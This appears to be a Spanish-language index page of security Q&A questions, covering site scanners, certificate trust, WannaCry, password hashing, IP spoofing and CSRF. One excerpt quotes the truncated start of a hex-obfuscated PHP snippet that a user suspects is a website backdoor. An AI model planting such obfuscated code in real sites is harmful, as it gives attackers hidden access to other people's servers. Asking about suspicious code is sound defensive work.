Todas las preguntas

7
respuestas

¿Cuáles son algunas buenas soluciones de escaneo de seguridad de sitios web?

¿Cuáles son algunas buenas soluciones de escaneo de seguridad de sitios web basados en web? No me preocupa demasiado si se trata de soluciones basadas en web o software que se pueda ejecutar localmente. En general, estoy buscando algo que pod...
pregunta 12.11.2010 - 02:13
1
respuesta

¿Por qué Firefox no confía en este certificado SSL del gobierno de EE. UU.?

¿No debería ser esto un certificado de confianza considerando que es un certificado SSL comodín? Es decir, ¿no debería *.delaware.gov cubrir www.corp.delaware.gov ?     
pregunta 28.02.2014 - 21:42
1
respuesta

¿Es esto una puerta trasera?

Encontré el siguiente código en el sitio de mis clientes. Parece un backdoor típico oculto con hexadecimal, pero no estoy 100% seguro. <?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x4...
pregunta 13.10.2014 - 16:58
2
respuestas

¿WannaCry infecta a Linux? [duplicar]

Después de leer esta pregunta , ahora, me pregunto si WannaCry malware puede infectar el sistema operativo Linux, especialmente Ubuntu. Una de las respuestas de las que se habla SMB2 y windows. ¿Significa que una computadora...
pregunta 14.05.2017 - 05:37
7
respuestas

Proteger la infraestructura estatal crítica de las consecuencias de una explosión nuclear

Los países dependen de la infraestructura informática para un gran porcentaje de comunicaciones y gestión militar, así como de servicios públicos como la electricidad. Desafortunadamente, los ataques nucleares liberan pulsos electromagnéticos ma...
pregunta 13.08.2012 - 16:19
3
respuestas

Stack Overflow is www.doioig.gov/? Si no, entonces podría estar infectado

¡Genial! Hice una publicación recientemente donde mencioné que mi sistema podría estar infectado. Ahora surgió algo nuevo. Cuando busco Stack Overflow en Google, veo que la URL es www.doioig.gov/ . Cuando hago clic en ese enlace, me llev...
pregunta 02.03.2013 - 19:09
5
respuestas

¿La eliminación no autorizada es un problema de integridad o disponibilidad?

Durante una prueba de aplicación web, he descubierto un problema de manipulación de parámetros que permite a un usuario eliminar los comentarios dejados por otros usuarios. No pueden modificar el contenido de los comentarios de otros usuarios, y...
pregunta 15.12.2016 - 14:18
6
respuestas

cambio de función de hash

Tengo las contraseñas de las cuentas de usuario almacenadas en una base de datos mediante una función de hash criptográfica insegura (antigua). ¿Cuál es el enfoque mejor / usual para cambiar la función de hash de contraseña? Solo dos ideas vi...
pregunta 27.08.2012 - 16:01
4
respuestas

¿Es posible pasar el protocolo de enlace TCP con una dirección IP falsificada?

Hace poco tiempo, mis amigos y yo discutimos si TCP Handshake se puede pasar con una dirección IP falsificada. Supongamos que tengo un servidor web que permite solo ciertos números de IP. ¿Alguien puede conectar ese servidor web por IP spoof?...
pregunta 14.06.2013 - 10:20
2
respuestas

Protección CSRF y aplicaciones de una sola página

Estoy en el proceso de escribir una aplicación web de cliente grueso con Angular.js (aplicación de una sola página) y me preguntaba cuáles son las mejores prácticas para asegurar la aplicación con un token CSRF. ¿Debo enviar un token CSRF cua...
pregunta 25.05.2013 - 18:31